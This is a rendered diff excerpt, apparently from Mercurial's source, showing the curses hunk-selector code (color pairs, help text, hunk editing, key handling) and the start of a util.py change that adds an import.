1566 attrlist is used to 'flavor' the returned color-pair. this information
1563 attrlist is used to 'flavor' the returned color-pair. this information
1567 is not stored in self.colorpairs. it contains attribute values like
1564 is not stored in self.colorpairs. it contains attribute values like
1568 curses.A_BOLD.
1565 curses.A_BOLD.
1569 """
1566 """
1570
1567
1571 if (name is not None) and name in self.colorpairnames:
1568 if (name is not None) and name in self.colorpairnames:
1572 # then get the associated color pair and return it
1569 # then get the associated color pair and return it
1573 colorpair = self.colorpairnames[name]
1570 colorpair = self.colorpairnames[name]
1574 else:
1571 else:
1575 if fgcolor is None:
1572 if fgcolor is None:
1576 fgcolor = -1
1573 fgcolor = -1
1577 if bgcolor is None:
1574 if bgcolor is None:
1578 bgcolor = -1
1575 bgcolor = -1
1579 if (fgcolor, bgcolor) in self.colorpairs:
1576 if (fgcolor, bgcolor) in self.colorpairs:
1580 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1577 colorpair = self.colorpairs[(fgcolor, bgcolor)]
1581 else:
1578 else:
1582 pairindex = len(self.colorpairs) + 1
1579 pairindex = len(self.colorpairs) + 1
1583 if self.usecolor:
1580 if self.usecolor:
1584 curses.init_pair(pairindex, fgcolor, bgcolor)
1581 curses.init_pair(pairindex, fgcolor, bgcolor)
1585 colorpair = self.colorpairs[
1582 colorpair = self.colorpairs[
1586 (fgcolor, bgcolor)
1583 (fgcolor, bgcolor)
1587 ] = curses.color_pair(pairindex)
1584 ] = curses.color_pair(pairindex)
1588 if name is not None:
1585 if name is not None:
1589 self.colorpairnames[name] = curses.color_pair(pairindex)
1586 self.colorpairnames[name] = curses.color_pair(pairindex)
1590 else:
1587 else:
1591 cval = 0
1588 cval = 0
1592 if name is not None:
1589 if name is not None:
1593 if name == b'selected':
1590 if name == b'selected':
1594 cval = curses.A_REVERSE
1591 cval = curses.A_REVERSE
1595 self.colorpairnames[name] = cval
1592 self.colorpairnames[name] = cval
1596 colorpair = self.colorpairs[(fgcolor, bgcolor)] = cval
1593 colorpair = self.colorpairs[(fgcolor, bgcolor)] = cval
1597
1594
1598 # add attributes if possible
1595 # add attributes if possible
1599 if attrlist is None:
1596 if attrlist is None:
1600 attrlist = []
1597 attrlist = []
1601 if colorpair < 256:
1598 if colorpair < 256:
1602 # then it is safe to apply all attributes
1599 # then it is safe to apply all attributes
1603 for textattr in attrlist:
1600 for textattr in attrlist:
1604 colorpair |= textattr
1601 colorpair |= textattr
1605 else:
1602 else:
1606 # just apply a select few (safe?) attributes
1603 # just apply a select few (safe?) attributes
1607 for textattrib in (curses.A_UNDERLINE, curses.A_BOLD):
1604 for textattrib in (curses.A_UNDERLINE, curses.A_BOLD):
1608 if textattrib in attrlist:
1605 if textattrib in attrlist:
1609 colorpair |= textattrib
1606 colorpair |= textattrib
1610 return colorpair
1607 return colorpair
1611
1608
1612 def initcolorpair(self, *args, **kwargs):
1609 def initcolorpair(self, *args, **kwargs):
1613 """same as getcolorpair."""
1610 """same as getcolorpair."""
1614 self.getcolorpair(*args, **kwargs)
1611 self.getcolorpair(*args, **kwargs)
1615
1612
1616 def helpwindow(self):
1613 def helpwindow(self):
1617 """print a help window to the screen. exit after any keypress."""
1614 """print a help window to the screen. exit after any keypress."""
1618 helptext = _(
1615 helptext = _(
1619 """ [press any key to return to the patch-display]
1616 """ [press any key to return to the patch-display]
1620
1617
1621 The curses hunk selector allows you to interactively choose among the
1618 The curses hunk selector allows you to interactively choose among the
1622 changes you have made, and confirm only those changes you select for
1619 changes you have made, and confirm only those changes you select for
1623 further processing by the command you are running (such as commit,
1620 further processing by the command you are running (such as commit,
1624 shelve, or revert). After confirming the selected changes, the
1621 shelve, or revert). After confirming the selected changes, the
1625 unselected changes are still present in your working copy, so you can
1622 unselected changes are still present in your working copy, so you can
1626 use the hunk selector multiple times to split large changes into
1623 use the hunk selector multiple times to split large changes into
1627 smaller changesets. the following are valid keystrokes:
1624 smaller changesets. the following are valid keystrokes:
1628
1625
1629 x [space] : (un-)select item ([~]/[x] = partly/fully applied)
1626 x [space] : (un-)select item ([~]/[x] = partly/fully applied)
1630 [enter] : (un-)select item and go to next item of same type
1627 [enter] : (un-)select item and go to next item of same type
1631 A : (un-)select all items
1628 A : (un-)select all items
1632 X : (un-)select all items between current and most-recent
1629 X : (un-)select all items between current and most-recent
1633 up/down-arrow [k/j] : go to previous/next unfolded item
1630 up/down-arrow [k/j] : go to previous/next unfolded item
1634 pgup/pgdn [K/J] : go to previous/next item of same type
1631 pgup/pgdn [K/J] : go to previous/next item of same type
1635 right/left-arrow [l/h] : go to child item / parent item
1632 right/left-arrow [l/h] : go to child item / parent item
1636 shift-left-arrow [H] : go to parent header / fold selected header
1633 shift-left-arrow [H] : go to parent header / fold selected header
1637 g : go to the top
1634 g : go to the top
1638 G : go to the bottom
1635 G : go to the bottom
1639 f : fold / unfold item, hiding/revealing its children
1636 f : fold / unfold item, hiding/revealing its children
1640 F : fold / unfold parent item and all of its ancestors
1637 F : fold / unfold parent item and all of its ancestors
1641 ctrl-l : scroll the selected line to the top of the screen
1638 ctrl-l : scroll the selected line to the top of the screen
1642 m : edit / resume editing the commit message
1639 m : edit / resume editing the commit message
1643 e : edit the currently selected hunk
1640 e : edit the currently selected hunk
1644 a : toggle all selections
1641 a : toggle all selections
1645 c : confirm selected changes
1642 c : confirm selected changes
1646 r : review/edit and confirm selected changes
1643 r : review/edit and confirm selected changes
1647 q : quit without confirming (no changes will be made)
1644 q : quit without confirming (no changes will be made)
1648 ? : help (what you're currently reading)"""
1645 ? : help (what you're currently reading)"""
1649 )
1646 )
1650
1647
1651 helpwin = curses.newwin(self.yscreensize, 0, 0, 0)
1648 helpwin = curses.newwin(self.yscreensize, 0, 0, 0)
1652 helplines = helptext.split(b"\n")
1649 helplines = helptext.split(b"\n")
1653 helplines = helplines + [b" "] * (
1650 helplines = helplines + [b" "] * (
1654 self.yscreensize - self.numstatuslines - len(helplines) - 1
1651 self.yscreensize - self.numstatuslines - len(helplines) - 1
1655 )
1652 )
1656 try:
1653 try:
1657 for line in helplines:
1654 for line in helplines:
1658 self.printstring(helpwin, line, pairname=b"legend")
1655 self.printstring(helpwin, line, pairname=b"legend")
1659 except curses.error:
1656 except curses.error:
1660 pass
1657 pass
1661 helpwin.refresh()
1658 helpwin.refresh()
1662 try:
1659 try:
1663 with self.ui.timeblockedsection(b'crecord'):
1660 with self.ui.timeblockedsection(b'crecord'):
1664 helpwin.getkey()
1661 helpwin.getkey()
1665 except curses.error:
1662 except curses.error:
1666 pass
1663 pass
1667
1664
1668 def commitMessageWindow(self):
1665 def commitMessageWindow(self):
1669 """Create a temporary commit message editing window on the screen."""
1666 """Create a temporary commit message editing window on the screen."""
1670
1667
1671 curses.raw()
1668 curses.raw()
1672 curses.def_prog_mode()
1669 curses.def_prog_mode()
1673 curses.endwin()
1670 curses.endwin()
1674 self.commenttext = self.ui.edit(self.commenttext, self.ui.username())
1671 self.commenttext = self.ui.edit(self.commenttext, self.ui.username())
1675 curses.cbreak()
1672 curses.cbreak()
1676 self.stdscr.refresh()
1673 self.stdscr.refresh()
1677 self.stdscr.keypad(1) # allow arrow-keys to continue to function
1674 self.stdscr.keypad(1) # allow arrow-keys to continue to function
1678
1675
1679 def handlefirstlineevent(self):
1676 def handlefirstlineevent(self):
1680 """
1677 """
1681 Handle 'g' to navigate to the top most file in the ncurses window.
1678 Handle 'g' to navigate to the top most file in the ncurses window.
1682 """
1679 """
1683 self.currentselecteditem = self.headerlist[0]
1680 self.currentselecteditem = self.headerlist[0]
1684 currentitem = self.currentselecteditem
1681 currentitem = self.currentselecteditem
1685 # select the parent item recursively until we're at a header
1682 # select the parent item recursively until we're at a header
1686 while True:
1683 while True:
1687 nextitem = currentitem.parentitem()
1684 nextitem = currentitem.parentitem()
1688 if nextitem is None:
1685 if nextitem is None:
1689 break
1686 break
1690 else:
1687 else:
1691 currentitem = nextitem
1688 currentitem = nextitem
1692
1689
1693 self.currentselecteditem = currentitem
1690 self.currentselecteditem = currentitem
1694
1691
1695 def handlelastlineevent(self):
1692 def handlelastlineevent(self):
1696 """
1693 """
1697 Handle 'G' to navigate to the bottom most file/hunk/line depending
1694 Handle 'G' to navigate to the bottom most file/hunk/line depending
1698 on the whether the fold is active or not.
1695 on the whether the fold is active or not.
1699
1696
1700 If the bottom most file is folded, it navigates to that file and
1697 If the bottom most file is folded, it navigates to that file and
1701 stops there. If the bottom most file is unfolded, it navigates to
1698 stops there. If the bottom most file is unfolded, it navigates to
1702 the bottom most hunk in that file and stops there. If the bottom most
1699 the bottom most hunk in that file and stops there. If the bottom most
1703 hunk is unfolded, it navigates to the bottom most line in that hunk.
1700 hunk is unfolded, it navigates to the bottom most line in that hunk.
1704 """
1701 """
1705 currentitem = self.currentselecteditem
1702 currentitem = self.currentselecteditem
1706 nextitem = currentitem.nextitem()
1703 nextitem = currentitem.nextitem()
1707 # select the child item recursively until we're at a footer
1704 # select the child item recursively until we're at a footer
1708 while nextitem is not None:
1705 while nextitem is not None:
1709 nextitem = currentitem.nextitem()
1706 nextitem = currentitem.nextitem()
1710 if nextitem is None:
1707 if nextitem is None:
1711 break
1708 break
1712 else:
1709 else:
1713 currentitem = nextitem
1710 currentitem = nextitem
1714
1711
1715 self.currentselecteditem = currentitem
1712 self.currentselecteditem = currentitem
1716 self.recenterdisplayedarea()
1713 self.recenterdisplayedarea()
1717
1714
1718 def confirmationwindow(self, windowtext):
1715 def confirmationwindow(self, windowtext):
1719 """display an informational window, then wait for and return a
1716 """display an informational window, then wait for and return a
1720 keypress."""
1717 keypress."""
1721
1718
1722 confirmwin = curses.newwin(self.yscreensize, 0, 0, 0)
1719 confirmwin = curses.newwin(self.yscreensize, 0, 0, 0)
1723 try:
1720 try:
1724 lines = windowtext.split(b"\n")
1721 lines = windowtext.split(b"\n")
1725 for line in lines:
1722 for line in lines:
1726 self.printstring(confirmwin, line, pairname=b"selected")
1723 self.printstring(confirmwin, line, pairname=b"selected")
1727 except curses.error:
1724 except curses.error:
1728 pass
1725 pass
1729 self.stdscr.refresh()
1726 self.stdscr.refresh()
1730 confirmwin.refresh()
1727 confirmwin.refresh()
1731 try:
1728 try:
1732 with self.ui.timeblockedsection(b'crecord'):
1729 with self.ui.timeblockedsection(b'crecord'):
1733 response = chr(self.stdscr.getch())
1730 response = chr(self.stdscr.getch())
1734 except ValueError:
1731 except ValueError:
1735 response = None
1732 response = None
1736
1733
1737 return response
1734 return response
1738
1735
1739 def reviewcommit(self):
1736 def reviewcommit(self):
1740 """ask for 'y' to be pressed to confirm selected. return True if
1737 """ask for 'y' to be pressed to confirm selected. return True if
1741 confirmed."""
1738 confirmed."""
1742 confirmtext = _(
1739 confirmtext = _(
1743 """If you answer yes to the following, your currently chosen patch chunks
1740 """If you answer yes to the following, your currently chosen patch chunks
1744 will be loaded into an editor. To modify the patch, make the changes in your
1741 will be loaded into an editor. To modify the patch, make the changes in your
1745 editor and save. To accept the current patch as-is, close the editor without
1742 editor and save. To accept the current patch as-is, close the editor without
1746 saving.
1743 saving.
1747
1744
1748 note: don't add/remove lines unless you also modify the range information.
1745 note: don't add/remove lines unless you also modify the range information.
1749 failing to follow this rule will result in the commit aborting.
1746 failing to follow this rule will result in the commit aborting.
1750
1747
1751 are you sure you want to review/edit and confirm the selected changes [yn]?
1748 are you sure you want to review/edit and confirm the selected changes [yn]?
1752 """
1749 """
1753 )
1750 )
1754 with self.ui.timeblockedsection(b'crecord'):
1751 with self.ui.timeblockedsection(b'crecord'):
1755 response = self.confirmationwindow(confirmtext)
1752 response = self.confirmationwindow(confirmtext)
1756 if response is None:
1753 if response is None:
1757 response = "n"
1754 response = "n"
1758 if response.lower().startswith("y"):
1755 if response.lower().startswith("y"):
1759 return True
1756 return True
1760 else:
1757 else:
1761 return False
1758 return False
1762
1759
1763 def recenterdisplayedarea(self):
1760 def recenterdisplayedarea(self):
1764 """
1761 """
1765 once we scrolled with pg up pg down we can be pointing outside of the
1762 once we scrolled with pg up pg down we can be pointing outside of the
1766 display zone. we print the patch with towin=False to compute the
1763 display zone. we print the patch with towin=False to compute the
1767 location of the selected item even though it is outside of the displayed
1764 location of the selected item even though it is outside of the displayed
1768 zone and then update the scroll.
1765 zone and then update the scroll.
1769 """
1766 """
1770 self.printitem(towin=False)
1767 self.printitem(towin=False)
1771 self.updatescroll()
1768 self.updatescroll()
1772
1769
1773 def toggleedit(self, item=None, test=False):
1770 def toggleedit(self, item=None, test=False):
1774 """
1771 """
1775 edit the currently selected chunk
1772 edit the currently selected chunk
1776 """
1773 """
1777
1774
1778 def updateui(self):
1775 def updateui(self):
1779 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1776 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1780 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1777 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1781 self.updatescroll()
1778 self.updatescroll()
1782 self.stdscr.refresh()
1779 self.stdscr.refresh()
1783 self.statuswin.refresh()
1780 self.statuswin.refresh()
1784 self.stdscr.keypad(1)
1781 self.stdscr.keypad(1)
1785
1782
1786 def editpatchwitheditor(self, chunk):
1783 def editpatchwitheditor(self, chunk):
1787 if chunk is None:
1784 if chunk is None:
1788 self.ui.write(_(b'cannot edit patch for whole file'))
1785 self.ui.write(_(b'cannot edit patch for whole file'))
1789 self.ui.write(b"\n")
1786 self.ui.write(b"\n")
1790 return None
1787 return None
1791 if chunk.header.binary():
1788 if chunk.header.binary():
1792 self.ui.write(_(b'cannot edit patch for binary file'))
1789 self.ui.write(_(b'cannot edit patch for binary file'))
1793 self.ui.write(b"\n")
1790 self.ui.write(b"\n")
1794 return None
1791 return None
1795
1792
1796 # write the initial patch
1793 # write the initial patch
1797 patch = stringio()
1794 patch = stringio()
1798 patch.write(diffhelptext + hunkhelptext)
1795 patch.write(diffhelptext + hunkhelptext)
1799 chunk.header.write(patch)
1796 chunk.header.write(patch)
1800 chunk.write(patch)
1797 chunk.write(patch)
1801
1798
1802 # start the editor and wait for it to complete
1799 # start the editor and wait for it to complete
1803 try:
1800 try:
1804 patch = self.ui.edit(patch.getvalue(), b"", action=b"diff")
1801 patch = self.ui.edit(patch.getvalue(), b"", action=b"diff")
1805 except error.Abort as exc:
1802 except error.Abort as exc:
1806 self.errorstr = stringutil.forcebytestr(exc)
1803 self.errorstr = stringutil.forcebytestr(exc)
1807 return None
1804 return None
1808 finally:
1805 finally:
1809 self.stdscr.clear()
1806 self.stdscr.clear()
1810 self.stdscr.refresh()
1807 self.stdscr.refresh()
1811
1808
1812 # remove comment lines
1809 # remove comment lines
1813 patch = [
1810 patch = [
1814 line + b'\n'
1811 line + b'\n'
1815 for line in patch.splitlines()
1812 for line in patch.splitlines()
1816 if not line.startswith(b'#')
1813 if not line.startswith(b'#')
1817 ]
1814 ]
1818 return patchmod.parsepatch(patch)
1815 return patchmod.parsepatch(patch)
1819
1816
1820 if item is None:
1817 if item is None:
1821 item = self.currentselecteditem
1818 item = self.currentselecteditem
1822 if isinstance(item, uiheader):
1819 if isinstance(item, uiheader):
1823 return
1820 return
1824 if isinstance(item, uihunkline):
1821 if isinstance(item, uihunkline):
1825 item = item.parentitem()
1822 item = item.parentitem()
1826 if not isinstance(item, uihunk):
1823 if not isinstance(item, uihunk):
1827 return
1824 return
1828
1825
1829 # To go back to that hunk or its replacement at the end of the edit
1826 # To go back to that hunk or its replacement at the end of the edit
1830 itemindex = item.parentitem().hunks.index(item)
1827 itemindex = item.parentitem().hunks.index(item)
1831
1828
1832 beforeadded, beforeremoved = item.added, item.removed
1829 beforeadded, beforeremoved = item.added, item.removed
1833 newpatches = editpatchwitheditor(self, item)
1830 newpatches = editpatchwitheditor(self, item)
1834 if newpatches is None:
1831 if newpatches is None:
1835 if not test:
1832 if not test:
1836 updateui(self)
1833 updateui(self)
1837 return
1834 return
1838 header = item.header
1835 header = item.header
1839 editedhunkindex = header.hunks.index(item)
1836 editedhunkindex = header.hunks.index(item)
1840 hunksbefore = header.hunks[:editedhunkindex]
1837 hunksbefore = header.hunks[:editedhunkindex]
1841 hunksafter = header.hunks[editedhunkindex + 1 :]
1838 hunksafter = header.hunks[editedhunkindex + 1 :]
1842 newpatchheader = newpatches[0]
1839 newpatchheader = newpatches[0]
1843 newhunks = [uihunk(h, header) for h in newpatchheader.hunks]
1840 newhunks = [uihunk(h, header) for h in newpatchheader.hunks]
1844 newadded = sum([h.added for h in newhunks])
1841 newadded = sum([h.added for h in newhunks])
1845 newremoved = sum([h.removed for h in newhunks])
1842 newremoved = sum([h.removed for h in newhunks])
1846 offset = (newadded - beforeadded) - (newremoved - beforeremoved)
1843 offset = (newadded - beforeadded) - (newremoved - beforeremoved)
1847
1844
1848 for h in hunksafter:
1845 for h in hunksafter:
1849 h.toline += offset
1846 h.toline += offset
1850 for h in newhunks:
1847 for h in newhunks:
1851 h.folded = False
1848 h.folded = False
1852 header.hunks = hunksbefore + newhunks + hunksafter
1849 header.hunks = hunksbefore + newhunks + hunksafter
1853 if self.emptypatch():
1850 if self.emptypatch():
1854 header.hunks = hunksbefore + [item] + hunksafter
1851 header.hunks = hunksbefore + [item] + hunksafter
1855 self.currentselecteditem = header
1852 self.currentselecteditem = header
1856 if len(header.hunks) > itemindex:
1853 if len(header.hunks) > itemindex:
1857 self.currentselecteditem = header.hunks[itemindex]
1854 self.currentselecteditem = header.hunks[itemindex]
1858
1855
1859 if not test:
1856 if not test:
1860 updateui(self)
1857 updateui(self)
1861
1858
1862 def emptypatch(self):
1859 def emptypatch(self):
1863 item = self.headerlist
1860 item = self.headerlist
1864 if not item:
1861 if not item:
1865 return True
1862 return True
1866 for header in item:
1863 for header in item:
1867 if header.hunks:
1864 if header.hunks:
1868 return False
1865 return False
1869 return True
1866 return True
1870
1867
1871 def handlekeypressed(self, keypressed, test=False):
1868 def handlekeypressed(self, keypressed, test=False):
1872 """
1869 """
1873 Perform actions based on pressed keys.
1870 Perform actions based on pressed keys.
1874
1871
1875 Return true to exit the main loop.
1872 Return true to exit the main loop.
1876 """
1873 """
1877 if keypressed in ["k", "KEY_UP"]:
1874 if keypressed in ["k", "KEY_UP"]:
1878 self.uparrowevent()
1875 self.uparrowevent()
1879 elif keypressed in ["K", "KEY_PPAGE"]:
1876 elif keypressed in ["K", "KEY_PPAGE"]:
1880 self.uparrowshiftevent()
1877 self.uparrowshiftevent()
1881 elif keypressed in ["j", "KEY_DOWN"]:
1878 elif keypressed in ["j", "KEY_DOWN"]:
1882 self.downarrowevent()
1879 self.downarrowevent()
1883 elif keypressed in ["J", "KEY_NPAGE"]:
1880 elif keypressed in ["J", "KEY_NPAGE"]:
1884 self.downarrowshiftevent()
1881 self.downarrowshiftevent()
1885 elif keypressed in ["l", "KEY_RIGHT"]:
1882 elif keypressed in ["l", "KEY_RIGHT"]:
1886 self.rightarrowevent()
1883 self.rightarrowevent()
1887 elif keypressed in ["h", "KEY_LEFT"]:
1884 elif keypressed in ["h", "KEY_LEFT"]:
1888 self.leftarrowevent()
1885 self.leftarrowevent()
1889 elif keypressed in ["H", "KEY_SLEFT"]:
1886 elif keypressed in ["H", "KEY_SLEFT"]:
1890 self.leftarrowshiftevent()
1887 self.leftarrowshiftevent()
1891 elif keypressed in ["q"]:
1888 elif keypressed in ["q"]:
1892 raise error.Abort(_(b'user quit'))
1889 raise error.Abort(_(b'user quit'))
1893 elif keypressed in ['a']:
1890 elif keypressed in ['a']:
1894 self.flipselections()
1891 self.flipselections()
1895 elif keypressed in ["c"]:
1892 elif keypressed in ["c"]:
1896 return True
1893 return True
1897 elif keypressed in ["r"]:
1894 elif keypressed in ["r"]:
1898 if self.reviewcommit():
1895 if self.reviewcommit():
1899 self.opts[b'review'] = True
1896 self.opts[b'review'] = True
1900 return True
1897 return True
1901 elif test and keypressed in ["R"]:
1898 elif test and keypressed in ["R"]:
1902 self.opts[b'review'] = True
1899 self.opts[b'review'] = True
1903 return True
1900 return True
1904 elif keypressed in [" ", "x"]:
1901 elif keypressed in [" ", "x"]:
1905 self.toggleapply()
1902 self.toggleapply()
1906 elif keypressed in ["\n", "KEY_ENTER"]:
1903 elif keypressed in ["\n", "KEY_ENTER"]:
1907 self.toggleapply()
1904 self.toggleapply()
1908 self.nextsametype(test=test)
1905 self.nextsametype(test=test)
1909 elif keypressed in ["X"]:
1906 elif keypressed in ["X"]:
1910 self.toggleallbetween()
1907 self.toggleallbetween()
1911 elif keypressed in ["A"]:
1908 elif keypressed in ["A"]:
1912 self.toggleall()
1909 self.toggleall()
1913 elif keypressed in ["e"]:
1910 elif keypressed in ["e"]:
1914 self.toggleedit(test=test)
1911 self.toggleedit(test=test)
1915 elif keypressed in ["f"]:
1912 elif keypressed in ["f"]:
1916 self.togglefolded()
1913 self.togglefolded()
1917 elif keypressed in ["F"]:
1914 elif keypressed in ["F"]:
1918 self.togglefolded(foldparent=True)
1915 self.togglefolded(foldparent=True)
1919 elif keypressed in ["m"]:
1916 elif keypressed in ["m"]:
1920 self.commitMessageWindow()
1917 self.commitMessageWindow()
1921 elif keypressed in ["g", "KEY_HOME"]:
1918 elif keypressed in ["g", "KEY_HOME"]:
1922 self.handlefirstlineevent()
1919 self.handlefirstlineevent()
1923 elif keypressed in ["G", "KEY_END"]:
1920 elif keypressed in ["G", "KEY_END"]:
1924 self.handlelastlineevent()
1921 self.handlelastlineevent()
1925 elif keypressed in ["?"]:
1922 elif keypressed in ["?"]:
1926 self.helpwindow()
1923 self.helpwindow()
1927 self.stdscr.clear()
1924 self.stdscr.clear()
1928 self.stdscr.refresh()
1925 self.stdscr.refresh()
1929 elif keypressed in [curses.ascii.ctrl("L")]:
1926 elif keypressed in [curses.ascii.ctrl("L")]:
1930 # scroll the current line to the top of the screen, and redraw
1927 # scroll the current line to the top of the screen, and redraw
1931 # everything
1928 # everything
1932 self.scrolllines(self.selecteditemstartline)
1929 self.scrolllines(self.selecteditemstartline)
1933 self.stdscr.clear()
1930 self.stdscr.clear()
1934 self.stdscr.refresh()
1931 self.stdscr.refresh()
1935
1932
1936 def main(self, stdscr):
1933 def main(self, stdscr):
1937 """
1934 """
1938 method to be wrapped by curses.wrapper() for selecting chunks.
1935 method to be wrapped by curses.wrapper() for selecting chunks.
1939 """
1936 """
1940
1937
1941 origsigwinch = sentinel = object()
1938 origsigwinch = sentinel = object()
1942 if util.safehasattr(signal, b'SIGWINCH'):
1939 if util.safehasattr(signal, b'SIGWINCH'):
1943 origsigwinch = signal.signal(signal.SIGWINCH, self.sigwinchhandler)
1940 origsigwinch = signal.signal(signal.SIGWINCH, self.sigwinchhandler)
1944 try:
1941 try:
1945 return self._main(stdscr)
1942 return self._main(stdscr)
1946 finally:
1943 finally:
1947 if origsigwinch is not sentinel:
1944 if origsigwinch is not sentinel:
1948 signal.signal(signal.SIGWINCH, origsigwinch)
1945 signal.signal(signal.SIGWINCH, origsigwinch)
1949
1946
1950 def _main(self, stdscr):
1947 def _main(self, stdscr):
1951 self.stdscr = stdscr
1948 self.stdscr = stdscr
1952 # error during initialization, cannot be printed in the curses
1949 # error during initialization, cannot be printed in the curses
1953 # interface, it should be printed by the calling code
1950 # interface, it should be printed by the calling code
1954 self.initexc = None
1951 self.initexc = None
1955 self.yscreensize, self.xscreensize = self.stdscr.getmaxyx()
1952 self.yscreensize, self.xscreensize = self.stdscr.getmaxyx()
1956
1953
1957 curses.start_color()
1954 curses.start_color()
1958 try:
1955 try:
1959 curses.use_default_colors()
1956 curses.use_default_colors()
1960 except curses.error:
1957 except curses.error:
1961 self.usecolor = False
1958 self.usecolor = False
1962
1959
1963 # In some situations we may have some cruft left on the "alternate
1960 # In some situations we may have some cruft left on the "alternate
1964 # screen" from another program (or previous iterations of ourself), and
1961 # screen" from another program (or previous iterations of ourself), and
1965 # we won't clear it if the scroll region is small enough to comfortably
1962 # we won't clear it if the scroll region is small enough to comfortably
1966 # fit on the terminal.
1963 # fit on the terminal.
1967 self.stdscr.clear()
1964 self.stdscr.clear()
1968
1965
1969 # don't display the cursor
1966 # don't display the cursor
1970 try:
1967 try:
1971 curses.curs_set(0)
1968 curses.curs_set(0)
1972 except curses.error:
1969 except curses.error:
1973 pass
1970 pass
1974
1971
1975 # available colors: black, blue, cyan, green, magenta, white, yellow
1972 # available colors: black, blue, cyan, green, magenta, white, yellow
1976 # init_pair(color_id, foreground_color, background_color)
1973 # init_pair(color_id, foreground_color, background_color)
1977 self.initcolorpair(None, None, name=b"normal")
1974 self.initcolorpair(None, None, name=b"normal")
1978 self.initcolorpair(
1975 self.initcolorpair(
1979 curses.COLOR_WHITE, curses.COLOR_MAGENTA, name=b"selected"
1976 curses.COLOR_WHITE, curses.COLOR_MAGENTA, name=b"selected"
1980 )
1977 )
1981 self.initcolorpair(curses.COLOR_RED, None, name=b"deletion")
1978 self.initcolorpair(curses.COLOR_RED, None, name=b"deletion")
1982 self.initcolorpair(curses.COLOR_GREEN, None, name=b"addition")
1979 self.initcolorpair(curses.COLOR_GREEN, None, name=b"addition")
1983 self.initcolorpair(
1980 self.initcolorpair(
1984 curses.COLOR_WHITE, curses.COLOR_BLUE, name=b"legend"
1981 curses.COLOR_WHITE, curses.COLOR_BLUE, name=b"legend"
1985 )
1982 )
1986 # newwin([height, width,] begin_y, begin_x)
1983 # newwin([height, width,] begin_y, begin_x)
1987 self.statuswin = curses.newwin(self.numstatuslines, 0, 0, 0)
1984 self.statuswin = curses.newwin(self.numstatuslines, 0, 0, 0)
1988 self.statuswin.keypad(1) # interpret arrow-key, etc. esc sequences
1985 self.statuswin.keypad(1) # interpret arrow-key, etc. esc sequences
1989
1986
1990 # figure out how much space to allocate for the chunk-pad which is
1987 # figure out how much space to allocate for the chunk-pad which is
1991 # used for displaying the patch
1988 # used for displaying the patch
1992
1989
1993 # stupid hack to prevent getnumlinesdisplayed from failing
1990 # stupid hack to prevent getnumlinesdisplayed from failing
1994 self.chunkpad = curses.newpad(1, self.xscreensize)
1991 self.chunkpad = curses.newpad(1, self.xscreensize)
1995
1992
1996 # add 1 so to account for last line text reaching end of line
1993 # add 1 so to account for last line text reaching end of line
1997 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1994 self.numpadlines = self.getnumlinesdisplayed(ignorefolding=True) + 1
1998
1995
1999 try:
1996 try:
2000 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
1997 self.chunkpad = curses.newpad(self.numpadlines, self.xscreensize)
2001 except curses.error:
1998 except curses.error:
2002 self.initexc = fallbackerror(
1999 self.initexc = fallbackerror(
2003 _(b'this diff is too large to be displayed')
2000 _(b'this diff is too large to be displayed')
2004 )
2001 )
2005 return
2002 return
2006 # initialize selecteditemendline (initial start-line is 0)
2003 # initialize selecteditemendline (initial start-line is 0)
2007 self.selecteditemendline = self.getnumlinesdisplayed(
2004 self.selecteditemendline = self.getnumlinesdisplayed(
2008 self.currentselecteditem, recursechildren=False
2005 self.currentselecteditem, recursechildren=False
2009 )
2006 )
2010
2007
2011 while True:
2008 while True:
2012 self.updatescreen()
2009 self.updatescreen()
2013 try:
2010 try:
2014 with self.ui.timeblockedsection(b'crecord'):
2011 with self.ui.timeblockedsection(b'crecord'):
2015 keypressed = self.statuswin.getkey()
2012 keypressed = self.statuswin.getkey()
2016 if self.errorstr is not None:
2013 if self.errorstr is not None:
2017 self.errorstr = None
2014 self.errorstr = None
2018 continue
2015 continue
2019 except curses.error:
2016 except curses.error:
2020 keypressed = b"foobar"
2017 keypressed = b"foobar"
2021 if self.handlekeypressed(keypressed):
2018 if self.handlekeypressed(keypressed):
2022 break
2019 break
2023
2020
2024 if self.commenttext != b"":
2021 if self.commenttext != b"":
2025 whitespaceremoved = re.sub(
2022 whitespaceremoved = re.sub(
2026 br"(?m)^\s.*(\n|$)", b"", self.commenttext
2023 br"(?m)^\s.*(\n|$)", b"", self.commenttext
2027 )
2024 )
2028 if whitespaceremoved != b"":
2025 if whitespaceremoved != b"":
2029 self.opts[b'message'] = self.commenttext
2026 self.opts[b'message'] = self.commenttext
@@ -1,3598 +1,3628 b''
1 # util.py - Mercurial utility functions and platform specific implementations
1 # util.py - Mercurial utility functions and platform specific implementations
2 #
2 #
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
3 # Copyright 2005 K. Thananchayan <thananck@yahoo.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
4 # Copyright 2005-2007 Matt Mackall <mpm@selenic.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
5 # Copyright 2006 Vadim Gelfer <vadim.gelfer@gmail.com>
6 #
6 #
7 # This software may be used and distributed according to the terms of the
7 # This software may be used and distributed according to the terms of the
8 # GNU General Public License version 2 or any later version.
8 # GNU General Public License version 2 or any later version.
9
9
10 """Mercurial utility functions and platform specific implementations.
10 """Mercurial utility functions and platform specific implementations.
11
11
12 This contains helper routines that are independent of the SCM core and
12 This contains helper routines that are independent of the SCM core and
13 hide platform-specific details from the core.
13 hide platform-specific details from the core.
14 """
14 """
15
15
16 from __future__ import absolute_import, print_function
16 from __future__ import absolute_import, print_function
17
17
18 import abc
18 import abc
19 import collections
19 import collections
20 import contextlib
20 import contextlib
21 import errno
21 import errno
22 import gc
22 import gc
23 import hashlib
23 import hashlib
24 import itertools
24 import itertools
25 import locale
25 import mmap
26 import mmap
26 import os
27 import os
27 import platform as pyplatform
28 import platform as pyplatform
28 import re as remod
29 import re as remod
29 import shutil
30 import shutil
30 import socket
31 import socket
31 import stat
32 import stat
32 import sys
33 import sys
33 import time
34 import time
34 import traceback
35 import traceback
35 import warnings
36 import warnings
36
37
37 from .thirdparty import attr
38 from .thirdparty import attr
38 from .pycompat import (
39 from .pycompat import (
39 delattr,
